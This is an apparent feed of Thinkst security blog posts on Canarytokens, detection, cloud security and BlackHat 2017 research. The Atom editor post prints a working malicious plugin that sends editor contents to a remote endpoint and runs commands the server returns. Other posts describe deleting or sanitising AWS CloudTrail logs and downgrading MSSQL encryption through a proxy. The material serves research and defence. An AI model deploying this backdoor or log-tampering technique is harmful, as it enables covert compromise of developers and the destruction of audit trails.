Quantcast
Channel: thinkst Thoughts...
Viewing all 105 articles
Browse latest View live

Canarytokens.org - Quick, Free, Detection for the Masses

$
0
0

Introduction

This is part 2 in a series of posts on our 2015 BlackHat talk, and covers our Canarytokens work.

You'll be familiar with web bugs, the transparent images which track when someone opens an email. They work by embedding a unique URL in a page's image tag, and monitoring incoming GET requests.

Imagine doing that, but for file reads, database queries, process executions, patterns in log files, Bitcoin transactions or even Linkedin Profile views. Canarytokens does all this and more, letting you implant traps in your production systems rather than setting up separate honeypots.

[Read More]

Unicorns, Startups and Hosted Email

$
0
0
A few days ago, @jack (currently the CEO of both Square && Twitter) posted a pic of his iPhone.

[original tweet]
 It struck me as slightly surprising that both Square & Twitter could be using Gmail. Both companies have a ton of talent who deeply understand message delivery and message queues. I wouldn't be at all surprised if both companies have people working there who worked on Sendmail or Postfix. On some levels, twitter competes with Google.. (if Google Pay is a thing, then so does Square).

Of course this is one of those times when you see a classic mismatch between "paranoid security guy" thinking, and "scale quick Silicon Valley" thinking. The paranoid security guy thinks: "So every time a twitter executive sends an email, people at Google can read it?" while the SV entrepreneur says: "It isn't core.. lets not spend engineering time on it at all".

I'm not going to make a call here on which route is better but i did wonder how common it was.. So.. I took a list of the current US/EU Unicorns, and decided to check who handles their mail. What you get, is the following:


Interestingly, about 60%of the current Unicorn set have their email handled by GMail. (A further 13.6%) have their mail handled by outlook.com (which means about 70% of the current startups with billion dollar valuations, don't handle their own email).
The list of companies using Gmail in that set are:
If we avoid the hyper focus on "Unicorns" and look elsewhere (like Business Insider's list of 38 coolest Startups) this percentage grows even bigger:


It is interesting that Gmail so completely dominates in terms of email handling, and it is equally surprising that so many companies so completely outsource this function. On this trajectory, it wont be long before we can stop calling it email, and can simply refer to it as gmail instead.

Ps. Anyone want to buy a book on sendmail macros? 


Stripping encryption from Microsoft SQL Server authentication

$
0
0

"Communication flow in the TDS 4.2 protocol" [msdn]
Our recent PyConZA talk had several examples of why Python is often an easy choice of language for us to quickly try things out. One example came from looking at network traffic of a client authenticating with Microsoft SQL Server (in order to simulate the server later). By default, we can't see what the authentication protocol looks like on the wire because the traffic is encrypted. This post is a brief account of stripping that encryption with a little help from Python's Twisted framework.

The clean overview of the authentication protocol on MSDN suggests that it would as easily readable as its diagram. Our first packet captures weren't as enlightening. Only the initial connection request messages from the client and server were readable. Viewing the traffic in Wireshark showed several further messages without a hint that the payloads were encrypted. A clearer hint was in the MSDN description of the initial client and server messages. There's a byte field in the header called ENCRYPTION. By default, both the client and server's byte is set to ENCRYPT_OFF(0x00), which actually means encryption is supported but just turned off. Once both endpoints are aware that the other supports the encryption, they begin to upgrade their connection.

Initial packet capture: upgrading to encrypted connection begins after initial pre-login messages

For our purposes, it would be better if ENCRYPTION fields were set to ENCRYPT_NOT_SUP(0x02), so that the server thinks the client doesn't support encryption and vice versa. We hacked together a crude TCP proxy to do this. We connect the client to the proxy, which in turn connects to the server and starts relaying data back and forth. The proxy watches for the specific string of bytes that mark the ENCRYPTION field from either client or the server and changes it. All other traffic passes through unaltered.

Proxying the MSSQL authentication

The proxy is built with Twisted which simplifies the connection setup. Twisted's asynchronous/event-driven style of network programming makes it easy to match bytes in the traffic and flip a bit in the match before sending it along again. The match and replace takes place in the dataReceived methods which Twisted calls with data being sent in either direction.

With the proxy in place, both sides think the other doesn't support encryption and the authentication continues in the clear.

Traffic between the proxy and the server of an unencrypted authentication


It's to be expected that opportunistic encryption of a protocol can be stripped by a mitm. Projects like tcpcrypt explicitly chose this tradeoff for interoperability with legacy implementations in hope of gaining widespread deployment of protection against passive eavesdropping. The reasons for Microsoft SQL authentication going this route isn't spelled out, but it's possible that interoperability with older implementations was a concern.


Enterprise Security: The wood for the trees?

$
0
0
We have been talking a fair bit over the past few years on what we consider to be some of the big, hidden challenges of information security [1][2][3]. We figured it would be useful to highlight one of them in particular: focusing on the right things.

As infosec creeps past its teenage years we've found ourselves with a number of accepted truths and best practices. These were well intentioned and may hold some value (to some orgs), but can often be misleading and dangerous. We have seen companies with huge security teams, spending tens, to hundreds of millions of dollars on information security, burning time, money and manpower on best practices that don't significantly improve the security posture of their organization. These companies invest in the latest products, attend the hottest conferences and look to hire smart people. They have dashboards tracking "key performance areas" (and some of them might even be in the green) but they still wouldn't hold up to about 4 days of serious attacker attention. All told, a single vulnerability/exploit would probably easily lead to the worst day of their lives (if an attacker bothered).

The "draining the swamp" problem.
"When you’re up to your neck in alligators, it’s easy to forget that the initial objective was to drain the swamp."

Even cursory examination of the average infosec team in a company will reveal a bunch of activities that occupy time & incur costs, but are for the most part dedicated to fighting alligators. As time marches on and staff churn happens, its entirely possible to have an entire team dedicated to fighting alligators (with nobody realising that they originally existed to drain the swamp).

How do I know if my organization is making this mistake too?
It is both easy, and more comfortable to be in denial about this. Fortunately, once considered it is just as easy to determine where your organization sits on this spectrum.

The litmus test we often recommend is this:
Imagine the person (people, or systems) that most matter to your company (from a security point of view). The ones that would offer your adversaries most value if compromised. Now, realistically try to determine how difficult it would be to compromise those people / systems.

In most cases, an old browser bug, some phishing emails and an afternoons worth of effort will do it. I'd put that at about a $1000 in attacker cost. Now it's time for you to do some calculations: if a $1000 in attacker costs is able to hit you where you would hurt most, then it's a safe bet that you have been focusing on the wrong things.

How is this possible?
It's relatively easy to see how we got here. Aside from vendors who work hard to convince us that we desperately need whatever it is that they are selling, we have also suffered from a lack of the right kind of feedback loops. Attackers are blessed with inherently honest metrics and a strong positive feedback loop. They know when they break in, they know when they grab the loot and they know when they fail. Defenders are deprived of this immediate feedback, and often only know their true state when they are compromised. To make matters worse, due to a series of rationalizations and platitudes, we sometimes even manage to go through compromises without acknowledging our actual state of vulnerability.

Peter Drucker famously said:
"What gets measured gets managed, even when it’s pointless to measure and manage it, and even if it harms the purpose of the organization to do so"

We have fallen into a pattern of measuring (and managing) certain things. We need to make sure that those things _are_ the things that matter.

What can we do?
As with most problems, the first step lies in acknowledging the problem. A ray of hope here, is that, in most cases, the problem doesn't appear to be an intractable one. In many ways, re-examining what truly matters for your organization can be truly liberating for the security team.

If it turns out that the Crown Jewels are a hand full of internal applications, then defending them becomes a solvable problem. If the Crown Jewels turn out to be the machines of a handful of execs (or scientists) then defending them becomes technically solvable. What's needed though is the acute realization that patching 1000 servers on the corporate network (and turning that red dial on the dashboard to green) could pale in significance to giving your CFO a dedicated iOS device as his web browser *.

In his '99 keynote (which has held up pretty well) Dr Mudge admonished us to make sure we knew where the companies crown jewels were before we planned any sort of defense. With hamster wheels of patching, alerts and best practices, this is easily forgotten, and we are more vulnerable for it.


* Please don't leave a comment telling me how patching the servers _is_ more important than protecting the CFO. This was one example.. If your crown jewels are hittable through the corporate server farm (or dependent on the security of AD) - then yes.. its where you should be focusing.

Certified Canarytokens: Alerts from signed Windows binaries and Office documents

$
0
0
As part of a talk at the ITWeb Security Summit last week, we discussed how to trigger email alerts when file signatures are validated with our Canarytokens project. Building on that alerting primitive, we can make signed executables that alert when run or signed Office documents that alert when opened. 


Canarytokens is our exploration of light-weight ways to detect when something bad has happened on the inside a network. (It’s not at all concerned with leaks in that dubious non-existing line referred to as “the perimeter” of a network.) We built an extensible server for receiving alerts from passive tokens that are left lying around. Tokens are our units of alerts. When a token URL link is fetched or a token DNS name is queried this triggers an alert via the Canarytokens server. With these (and other tokens) we set out to build alerts for more significant incidents.

Office Document Signatures


A security researcher, Alexey Tyurin, drew our attention to how opening signed Office documents can trigger token alerts. On opening a signed Word document, Office verifies the signature automatically with the certificate embedded in the document. A notable exception to this is when a document is opened with Protected View enabled (typically after the document is downloaded from the web or opened as an email attachment.) The signature verification in that case, happens only after the user clicks to disable protected view. During the verification, a URL from the certificate is fetched. We can set the retrieved URL to a token URL (which integrates with Canarytokens to fire an alert to set us off). The URL we set is in a field called Authority Information Access (AIA). This field tells the signature verifier where to fetch more information about the CA (such as intermediate CAs needed to verify the signing certificate).


Signed document that has already triggered an alert

Signing Word documents gives us  another way to alert when the document is opened. The previous technique, which is implemented on Canarytokens, uses a remote tracking image embedded in the document. While the document signing is not currently integrated in Canarytokens, it can easily be automated. This requires creating a throwaway CA with token URLs to generate a tokened signing certificate and then signing a document. Thanks to Tyurin, creating the CA is a short script. Signing the document programmatically can be tricky to get right. We've automated this by offloading the signing to the Apache POI library in a Java program.

It’s worth noting more closely how the token URL is hit: Office offloads the signature verification to the Microsoft CryptoAPI which is what hits the URL. (In our tests the User-Agent that hits the URL is Microsoft-CryptoAPI/6.1). We should be able to re-use this trick with other applications that offload the signature verification in this way.

Windows Executables Signatures


A signed copy of Wireshark
If signed documents could be used to trigger Canarytokens we wondered where else this could work. Microsoft’s Authenticode allows signing Windows PE files, such as executables and dlls. The executables signatures are verified on launch if the setting for it is enabled in the security policy. The name of the setting is a mouthful: System settings: Use Certificate Rules on Windows Executables for Software Restriction Policies". Our initial tests of signed .NET DLLs were able to trigger alerts when loaded by custom executables even without the setting enabled. However, if Authenticode can alert us when Windows executables have been launched, we have a uniquely useful way of knowing when binaries had been executed, without any endpoint solutions installed.

To deploy signed executables, all that is needed is to token executables that attackers routinely run such as ipconfig.exe, whoami.exe and net.exe to alert us to an attacker rummaging around where they shouldn’t be. Zane Lackey's highly recommended talk (and slides) on building defenses in reaction to real world attack patterns makes the case for how alerts like these can build solid attacker detection.

The verification, just like in the Office document case, is offloaded for Microsoft CryptoApi to handle. Signing certificates for the executables are produced in the same way. However, the signing certificate must also have the Code Signing key usage attribute set. Creating signed binaries is made simple by Didier Stevens’ extensive work on Authenticode. This is integrated into Canarytokens to make signing a binary as simple as uploading a copy to sign, but is also available as a standalone tool from the source.


AIA fields of a signing certificate
To sign an executable on Canarytokens, you upload an executable to the site. The site will sign the binary with a tokened signing certificate. Simply replace the original executable with the tokened one and verify that signature verification for executables is enabled. An attacker who lands on the machine and runs the tokened executable, will trigger the signature verification which gets an alert email sent (via Canarytokens) to let you know that something bad has happened.

Many of our other canary tokens are built on top of application-specific quirks. Adobe Reader, for example, has the peculiar behaviour of pre-flighting certain DNS requests on opening a PDF file. What the Office document and executable signings point to, is a more generic technique for alerting on signature (and certificate) validation. This a more notable alerting primitive and is likely more stable than application quirks given that URL-fetching extensions are enshrined in certificate standards. Although in this post we’ve used the technique in only two places, more may be lying in wait.

Edited 2016-06-14: Thanks to Leandro in the comments and over email, this post has been updated with his observation that Office document signature verification won't happen automatically when the document opens Protected View.

Slack[ing] off our notifications

$
0
0
We :heart: Slack. The elderly in our team were IRC die hards, but Slack even won them over (if for no other reason, for their awesome iOS changelogs).


Thanks to Slack integrations, its robust API and webhooks, we have data from all over filter into our Slack, from exception reporting to sales enquiries. If it’s something we need to know, we have it pushed through to Slack.


At the same time, our Canary product (which prides itself on helping you “Know. When it matters”) was able to push out alerts via email, sms or over it’s RESTful API. Canaries are designed from the ground up to not be loquacious. I.e They don’t talk much, but when they do, you probably should pay attention. Having them pipe their results into Slack seemed a no-brainer.


Our initial stab at this was simple: By allowing a user to enter the URL for a webhook in their Console, we could send events through to the Slack channel of their choosing.

Thinkst Canary - Configuration 🔊 2016-05-26 11-04-27.png


Of course, this wasn’t all that was needed to this get working. The user would first have to create their webhook. Typically, this would require the user to:

Click on his team name, and navigate to Apps & Integrations


Hit the slack apps page and navigate to “Build”


Be confused for a while before choosing “Make a custom integration”

Select “Incoming Webhooks”



At this point the user either:
1.Decides this is too much work and goes to watch Game of Thrones
2.Goes to read the “Getting started” Guide before going to [a]
3.Chooses his destination channel and clicks “Add Incoming webhooks Integration” 


After all this, the user’s reward is a page with way more options than is required for our needs (from a developer's point of view, the options are a delight and the documentation is super helpful, but for an end user... Oy vey!)

Finally... the user can grab the webhook URL, and insert it in the settings page of their console.

(This isn’t the most complicated thing ever... It’s not as confusing as trying to download the JDK - but Canary is supposed to make our users' lives easier, not drive them to drink)

With a bit of searching, we  found the Slack Button.  

add_to_slack@2x.png

This is Slack's way of allowing developers to make deploying integrations quick and painless. This means that our previous 8 step process (9 if you count watching Game of Thrones) becomes the following:

The User clicks on the “Add to Slack” button (above)

He is automatically directed to a page where he authorises the action (and chooses a destination channel) 



There is no step 3:



Of course, we do a little more work, to allow our users to easily add multiple integrations, but this is because we are pretty fanatical about what we do.

At the end of it though, 2 quick steps, and you too can have Canary goodness funnelled to one of your Slack channels!

Slack 2016-05-25 12-22-32.png

At the moment, we simply use the incoming webhooks to post alerts into Slack but there is lots of room to expand using slash commands or bot users, and we heard that all the cool kids are building bots. (aka: watch this space!)  

P.S. If you are a client, visit /settings on your console to see the new functionality.

Cloud Canary Beta

$
0
0
Is that a cloud next to Tux?

We are sorry that this blog has been so quiet lately. Our Canary product took off like a rocket and we've had our heads down giving it our all. This month we released version-2 with a bunch of new features. You really should check it out.

Since almost day one, customers have been asking for virtual Canaries.  We generally prefer doing one thing really well over doing multiple things "kinda ok", so we held off virtualising Canary for a long time. This changes now.

With Canary software now on version 2.0 and running happily across thousands of birds, a crack at virtual Canaries make sense. Over the past couple of months we’ve been working to get Canaries virtualised, with a specific focus initially, on Amazon’s EC2.

We're inviting customers to participate in a beta for running Canaries in Amazon’s EC2. The benefits are what you’d expect: no hardware, no waiting for shipments and rapid deployments. You can plaster your EC2 environment with Canaries, trivially.

The beta won't affect your current licensing, and you’re free to deploy as many Cloud Canaries as you like during the beta period. They use the same console as your other birds, and integrate seamlessly.

Mail cloudcanarybeta@canary.tools if you’d like to participate and we'll make it happen.

Introducing our Python API Wrapper

$
0
0

Introducing our Python API Wrapper

With our shiny new Python API wrapper, managing your deployed Canaries has never been simpler. With just a few simple lines of code you'll be able to sort and store incident data, reboot all of your devices, create Canarytokens, and much more (Building URLs correctly and parsing JSON strings is for the birds...).

So, how do you get started? Firstly you'll need to install our package. You can grab it from a number of places:
  • Or simply startup your favourite shell and run "pip install canarytools"
Assuming you already have your own Canary Console (see our website for product options) and a flock of devices, getting started is very easy indeed! First, instantiate the Console object: 


Your API_KEY can be retrieved from your Console's Console Setup page. The CLIENT_DOMAIN is the tag in-front of "canary.tools" in your Console's url. For example in https://testconsole.canary.tools/settings "testconsole" is the domain.

Alternatively a .config file can be downloaded and placed on your system (place this in ~/ for Unix (and Unix-like) environments and C:\Users\{Current Users}\ for Windows environments). This file contains all the goodies needed for the wrapper to communicate with the Console. Grab this from the Canary Console API tab under Console Setup (This is great if you'd rather not keep your api_key and/or domain name in your code base).



Click 'Download Token File' to download the API configuration file.




To give you a taste of what you can do with this wrapper, let's have a look at a few of its features:

Device Features

Want to manage all of your devices from the comfort of your bash-shell? No Problem...

Assuming we have instantiated our Console object we can get a handle to all our devices in a single line of code:

From here it is straightforward to do things such as update all your devices, or even reboot them:

Incident Features

Need the ability to quickly access all of the incidents in your console? We've got you covered. Getting a list of incidents across all your devices and printing the source IP of the incident is easy:

Acknowledging incidents is also straightforward. Let's take a look at acknowledging all incidents from a particular device that are 3 weeks or older:


Canarytoken Features

Canarytokens are one of the newest features enabled on our consoles. (You can read about them here). Manage your Canarytokens with ease. To get a list of all your tokens simply call:

You can also create tokens:


Enable/disable your tokens:


Whitelist Features

If you'd like to whitelist IP addresses and destination ports programmatically, we cater for that too:


This is just a tiny taste of what you can do with the API. Head over to our documentation to see more. We're hoping the API will make your (programatic) interactions with our birds a breeze.


Article 0

$
0
0

Get notifications when someone accesses your Google Documents (aka: having fun with Google Apps Script)


Our MS Word and PDF tokens are a great way to see if anyone is snooping through your documents. One simply places the document in an enticing location and waits. If the document is opened, a notification (containing useful information about the viewer) is sent to you. Both MS Word tokens and PDF tokens work by embedding a link to a resource in the tokened document. When the document is opened an attempt to fetch the resource is made. This is the request which tickles the token-server, which leads to you being notified.

Because so many of us store content on Google Drive we wanted to do something similar with Google Documents and Google Sheets. Using the embedded image approach was possible in Google Sheets, however, due to image caching coupled with weak API support for Google Documents we turned to Google Apps Script.

Google Apps Script is a powerful Javascript platform with which to create add-ons for Google Sheets, Docs, or Forms. Apps Script allows your documents to interface with most Google services - it's pretty sweet. Want to access all your Drive files from a spreadsheet? No problem! Want to access the Google Maps service from a document? No problem! Want to hook the Language API to your Google Forms? Easy. It's also possible to create extensions to share with the community. You can even add custom UI features.

The Apps Script files can be published in three different ways.

  1. The script may be bound to a document (this is the approach we followed);
  2. It may be published as a Chrome extension;
  3. It may be published to be used by the Google Execution API (the Execution API basically allows you to create ones own API endpoints to be used by a client application).  

With the script bound to a document, the Apps Script features most important for our purposes are: Triggers, the UrlFetchApp service, and the Session service. A brief outline of the flow is:

  1. A user opens the document, 
  2. A trigger is fired which grabs the perpetrator's email address;
  3. This is sent via a request notification to the document owner. 

A more detailed outline of each feature is given bellow.

Triggers

Apps Script triggers come in two flavours: simple and installable. The main difference between the two is the number of services they're allowed to access. Many services require user authorisation before giving the app access to a user's data. Each flavour also has separate types. For example: "on open", "on edit", "on install", even timed triggers.  For our purposes the "on open" installable triggers proved most useful.

UrlFetchApp service

This service simply gives one's script the ability to make HTTP requests. This service was used to send the requests needed to notify the document owner that the token'd document had been opened. Useful information about the document viewer may also be sent as the payload of a POST request.

Session service

The Session service provides access to session information, such as the user's email address and language setting. This was used to see exactly which user opened the document.

Putting it all together

So, what does this all look like? Let's go ahead and open up a new Google sheet and navigate to the Script editor.


Open the Script editor


Once in the Script editor create a new function named whatever you like (in our case it is called "notify"). Here a payload object is constructed which contains the email address of the document owner, the email address of the document viewer and the document viewer's locale. This information is then sent to an endpoint. Here we use hookbin for convenience. 


Write a function which sends user information to an endpoint


Once the file has been saved and our notify function is solid, we can go ahead and add the "on open" trigger. To do this: open the Edit tab dropdown from the script editor and go to "Current project's triggers".

Open the project's triggers


Under the current project's triggers add an "On open" trigger to the notify function. This trigger will cause the "notify" function to run each time the document is opened.


Add an "On open" trigger to the "notify" function

Because the function is accessing user data (the Session service) as well as connecting to an external service (sending requests to Hookbin) the script will require a set of permissions to be accepted before being run.


Set of permissions needed by the installable trigger


Once the permissions have been accepted all that remains is for the document to be shared. You can share the document with specific people or anyone on the internet. The only caveat being that the document needs to be shared with EDIT permissions or else the script will not function correctly.

Every time the document is opened post requests will be sent to the endpoint. Below is an example of the contents of the POST request sent to Hookbin.

The request contents received by the endpoint

Limitations

We ran into a few limitations while investigating the use of Apps Script for tokens. While copying a document as another Google user would also copy the script bound to the document, it would not copy the triggers if any had been previously installed. Thus, the user with which the document was shared would need to manually add the triggers to the copied document. Another limitation was that anyone viewing the document needed to have EDIT permissions in order for the script to work correctly. This could prove problematic if the person viewing the document decided to delete/edit the script and/or document.

We overcame this, through some creativity and elbow grease..

onEnd()

Thanks for reading. The methods described here were used in our new Google Docs/Sheets Canarytokens for our Canary product, you should totally check them out! We hope you found this useful and that you'll come up with some other cool new ways to use Google Apps Script!

A guide to Birding (aka: Tips for deploying Canaries)

$
0
0
Heres a quick, informal guide to deploying birds. It isn't a Canary user guide and should:
  • be a fun read;
  • be broadly applicable. 
One of Canary's core benefits is that they are quick to deploy (Under 5 minutes from the moment you unbox them) but this guide should seed some ideas for using them to maximum effect.

Grab the Guide Here(No registration, No Tracking Link, No Unnecessary Drama)

If you have thoughts, comments, or ideas, hit us back at info@canary.tools or DM us on twitter @thinkstCanary

BlackHat 2017 Series

$
0
0
[Update: jump to the end of the page for the series index]

Late July found Haroon and I sweating buckets inside an 8th storey Las Vegas hotel room. Our perspiration was due not to the malevolent heat outside but to the 189 slides we were building for BlackHat 2017. Modifications to the slidedeck continued until just before the talk, and we're now posting a link to the final deck. Spoiler alert: it's at the bottom of this post.

A few years ago (2009, but who's counting) we spoke at the same conference and then at DEF CON on Clobbering the Cloud. It's a little hard to recall the zeitgeist of bygone times, but back then the view that "the Cloud is nothing new" was prominent in security circles (and, more broadly, in IT). The main thrust of the previous talk was taking aim at that viewpoint, showing a bunch of novel attacks on cloud providers and how things were changing:


Eight years on, and here we are again talking about Cloud. In the intervening years we've built and run a cloud-reliant product company, and securing that chews up a significant amount of our time. With the benefit of actual day-to-day usage and experience we took another crack at Cloud security. This time the main thrust of our talk was:


In our 2017 talk we touch on a bunch of ways in which security teams are often still hobbled by a view of Cloud computing that's rooted in the past, while product teams have left most of us in the dust. We discuss insane service dependency graphs and we show how simple examples of insignificant issues in third parties boomerang into large headaches. We talk software supply chains for your developers through malicious Atom plugins. Detection is kinda our bag, so we're confident saying that there's a dearth of options in the Cloud space, and go to some lengths to show this. We cover seldom-examined attack patterns in AWS, looking at recon, compromise, lateral movement, privesv, persistence and logging disruption. Lastly we took an initial swing at BeyondCorp, the architecture improvement from Google that's getting a bunch of attention.

We'd be remiss in not mentioning Atlassian's Daniel Grzelak who has been developing attacks against AWS for a while now. He's been mostly a lone voice on the topic.

One of our takeaways is that unless you're one of the few large users of cloud services, it's unlikely you're in a position to devote enough time to understanding the environment. This is a scary proposition as the environment is not fully understood even by the large players. You thought Active Directory was complex? You can host your AD at AWS, it's 1 of 74 possible services you can run on AWS.

The talk was the result of collaboration between a bunch of folks here at Thinkst. Azhar, Jason, Max and Nick all contributed, and in the next few weeks we'll be seeing posts from them talking about specific sub-topics they handled. We'll update this post as each new subtopic is added.

The full slidedeck is available here.

Posts in this series


  1. All your devs are belong to us: how to backdoor the Atom editor
  2. Disrupting AWS S3 Logging

All your devs are belong to us: how to backdoor the Atom editor

$
0
0
This is the first post in a series highlighting bits from our recent BlackHat USA 2017 talk. An index of all the posts in the series is here.

Introduction

In this post we'll be looking at ways to compromise your developers that you probably aren't defending against, by exploiting the plugins in their editors. We will therefore be exploring Atom, Atom plugins, how they work and the security shortfalls they expose.

Targeting developers seems like a good idea (targeting sysadmins is so 2014). If we can target them through a channel that you probably aren't auditing, thats even better!

Background

We all need some type of editor in our lives to be able to do the work that we do. But, when it comes to choosing an editor, everyone has their own views. Some prefer the modern editors like Atom or Sublime, while others are more die-hard/ old school and prefer to stick to Vim or Emacs. Whatever you chose, you'll most likely want to customize it in some way (if not, I am not sure I can trust you as a person let alone a developer).  

Plugins and Extensions on modern editors are robust. Aside from cosmetic customization (font, color scheme, etc) they also allow you a range of functionality to make your life easier: from autocomplete and linters to minimaps, beautifiers and git integration, you should be able to find a plugin that suits your needs. If you don't, you can just create and publish one.

Other users will download new plugins to suit their needs, continuously adding to their ever growing list of them (because who has the time to go back and delete old unused plugins?) Many editors support automatic updates to ensure that any bugs are fixed and new features are enjoyed immediately.

For this post I'll focus specifically on Atom, Github's shiny new editor.  According to their site it's a "hackable text editor for the 21st century" (heh!). Atom's user base is continuously growing, along with their vast selection of packages.  You can even install Atom on your Chromebook with a few hacks, which bypasses the basic security model on ChromeOS.

The Goal

I was tasked with exploring the extent of damage that a malicious Atom plugin could do. We weren't sure what obstacles we'd face or what security measures were in place to stop us being evil. It turns out there were none... within a couple hours I had not only published my first app, but had updated it to include a little bit of malicious code too. 

The plan was simple:


Step One:  Get a simple package (plugin) published
  • What was required and how difficult would it be (do we need our app to be vetted)?
Step Two:  Test the update process
  • If you were going to create a malicious package you'd first create a useful non-malicious one that would create a large user base and then push an update that would inject the unsavory code.
Step Three:  Actually test what we could achieve from within an Atom package
  • We'd need to determine if there was any form of sandboxing, what libraries we'd have access to, etc.

Hello Plugin

Step One

This was trivially simple. There are lots of guides to creating and publishing packages for Atom out there, including a detailed one on their site.  

Generate a new package:

cmd + shift + p
Package Generator: Generate Package

This will give you a package with a simple toggle method that we will use later:

toggle: ->
console.log 'touch-type-teacher was toggled!'

Push the code to a Git repo:

git init
git add .
git commit -m "First commit"
git remote add origin <remote_repo_url>
git push -u origin master

Publish your Atom package 

apm-beta publish minor

Step Two

This was even easier seeing as the initial setup was complete:  

Make a change:

toggle: ->
console.log 'touch-type-teacher was toggled!'
console.log 'update test'

Push it to Github:

git commit -a -m 'Add console logging'
git push

Publish the new version:

apm-beta publish minor

So that's step one and two done, showing how easy it is to publish and update your package. The next step was to see what could actually be done with your package.  


That seems like a reasonable request

Step Three

Seeing as packages are built on node.js, the initial test was to see what modules we had access to.

The request package seemed a good place to start as it would allow us to get data off the user's machine and into our hands.

Some quick digging found that it was easy to add a dependency to our package:

npm install --save request@2.73.0
apm install

Import this in our code:

request = require 'request'

Update our code to post some data to our remote endpoint:

toggle: ->
    request 'http://my-remote-endpoint.com/run?data=test_data', (error, response, body) =>
        console.log 'Data sent!'

With this, our package will happily send information to us whenever toggled.

Now that we have a way to get information out, we needed to see what kind of information we had access to.

Hi, my name is...

Let's change our toggle function to try and get the current user and post that:

toggle: ->
{spawn} = require 'child_process'
test = spawn 'whoami'
test.stdout.on 'data', (data) ->
request 'http://my-remote-endpoint.com/run?data='+data.toString().trim(), (error, response, body) =>
            console.log 'Output sent!'

This actually worked too... meaning we had the ability to run commands on the user's machine and then extract the output from them if needed.

At this point we had enough information to write it up, but we took it a little further (just for kicks).

Simon Says

Instead of hardcoding commands into our code, let's send it commands to run dynamically! While we are at it, instead of only firing on toggling of our package, let's fire whenever a key is pressed.

First we'll need to hook onto the onChange event of the current editor:

module.exports = TouchTypeTeacher =
touchTypeTeacherView: null
modalPanel: null
subscriptions: null
editor: null

activate: (state) ->
@touchTypeTeacherView = new TouchTypeTeacherView(state.touchTypeTeacherViewState)
@modalPanel = atom.workspace.addModalPanel(item: @touchTypeTeacherView.getElement(), visible: false)
@editor = atom.workspace.getActiveTextEditor()
@subscriptions = new CompositeDisposable

@subscriptions.add atom.commands.add 'atom-workspace', 'touch-type-teacher:toggle':=> @toggle()
@subscriptions.add @editor.onDidChange (change) => @myChange()

Then create the myChange function that will do the dirty work:

myChange: ->
    request 'http://my-remote-endpoint.com/test?data='+@editor.getText(), (error, response, body) =>
        {spawn} = require 'child_process'
test = spawn body
console.log 'External code to run:\n'+ body
test.stdout.on 'data', (data) ->
console.log 'sending output'
request 'http://my-remote-endpoint.com/run?data='+ data.toString().trim(), (error, response, body) =>
               console.log 'output sent!'

What happens in this code snippet is a bit of overkill but it demonstrates our point. On every change in the editor we will send the text in the editor to our endpoint, which in turn returns a new command to execute. We run the command and send the output back to the endpoint.

Demo

Below is a demo of it in action. On the left you'll see the user typing into the editor, and on the right you'll see the logs on our remote server.



Our little plugin is not going to be doing global damage anytime soon. In fact we unpublished it once our tests were done. But what if someone changed an existing plugin which had lots of active users? Enter Kite.

Kite and friends

While we were ironing out the demo and wondering how prevalent this kind of attack was, an interesting story emerged. Kite, who make cloud-based coding tools, hired the developer of Minimap (an Atom plugin with over 3.8 million downloads) and pushed an update for it labelled "Implement Kite promotion". This update, among other things, inserted Kite ads onto the minimap.

In conjunction with this, it was found that Kite had silently acquired autocomplete-python (another popular Atom plugin) a few months prior and had promoted the use of Kite over the open source alternative.

Once discovered, Kite was forced to apologize and take steps to ensure they would not do it again (but someone else totally could!).

Similar to the Kite takeover of Atom packages (but with more malicious intent) in the past week it has been reported that two Chrome extensions had been taken over by attackers and had adware injected into them. Web Developer for Chrome and Copyfish both fell victims to the same phishing attack. Details of the events can be read about here (Web Developer) and here (Copyfish) but the gist of it was the popular extensions for Chrome had been compromised and users of the extensions fell victim without knowing it.

Wrapping up

We created a plugin and published it without it being picked up as malicious. This plugin runs without a sandbox and without a restrictive permissions model to prevent us stealing all the information the user has access to. Even if there was some kind of code analysis conducted on uploaded code, it's possible to remotely eval() code at runtime.  Automatic updates means that even if our plugin is benign today, it could be malicious tomorrow.

Forcing developers to use only a certain controlled set of tools/plugins seems draconian, but if it is not controlled, it's getting more and more difficult to secure.



Disrupting AWS S3 Logging

$
0
0
This post continues the series of highlights from our recent BlackHat USA 2017 talk. An index of all the posts in the series is here.


Introduction

Before today's public clouds, best practice was to store logs separately from the host that generated them. If the host was compromised, the logs stored off it would have a better chance of being preserved.

At a cloud provider like AWS, a storage service within an account holds your activity logs. A sufficiently thorough compromise of an account could very well lead to disrupted logging and heightened pain for IR teams. It's analogous to logs stored on a single compromised machine: once access restrictions to the logs are overcome, logs can be tampered with and removed. In AWS, however, removing and editing logs looks different to wiping logs with rm -rf.

In AWS jargon, the logs originate from a service called CloudTrail. A Trail is created which delivers the current batch of activity logs in a file to a pre-defined S3 bucket at variable intervals. (Logs can take up to 20 mins to be delivered).

CloudTrail logs are often collected in the hope that should a breach be discovered, there will be useful audit trail in the logs. The logs are the only public record of what happened while the attacker had access to an account, and form the basis of most AWS defences. If you haven't enabled them on your account, stop reading now and do your future self a favour.

Prior work

In his blog post, Daniel Grzelak explored several fun consequences of the fact that logs are stored in S3. For example, he showed that when a file lands in an S3 bucket, it triggers an event. A function, or Lambda in AWS terms, can be made to listen for this event and delete logs as soon as they arrive. The logs continue to arrive as normal (except for the logs evaporating on arrival.)

Flow of automatic log deletion

Versions, lambdas and digests

Adding "versioning" to S3 buckets (which keeps older copies of files once they are overwritten) won't help, if an attacker can grant permission to delete the older copies. Versioned buckets do have the option of having versioned items protected from deletion by multi-factor auth ("MFA-delete"). Unfortunately it seems like only the AWS account's root user (as the sole owner all S3 buckets in an account) can configure this, making it less easy to enable in typical setups where root access is tightly limited.

In any case, an empty logs bucket will inevitably raise the alarm when someone comes looking for logs. This leaves the attacker with a pressing question: how do we erase our traces but leave the rest of the logs available and readable? The quick answer is that we can modify the lambda to check every log file and delete any dirty log entries before overwriting them with a sanitised log file.

But a slight twist is needed: when modifying logs, the lambda itself generates more activity which in turn adds more dirty entries to the logs. By adding a unique tag to the names of pieces of the log-sanitiser (such as name of the policies, roles and lambdas), these can be deleted like any other dirty log entries so that the log-sanitiser eats it's own trail. In this code snippet, any role, lambda or policy that includes thinkst_6ae655cf will be kept out of the logs.

That would seem to present a complete solution, except that AWS Cloudtrail also offers log validation (aimed specifically at mitigating silent changes to logs after delivery). At regular intervals, the log trail delivers a (signed) digest file that attests to the contents of all the log files delivered in the past interval. If a log file covered by the digest changes, that digest file validation fails.

A slew of digest files

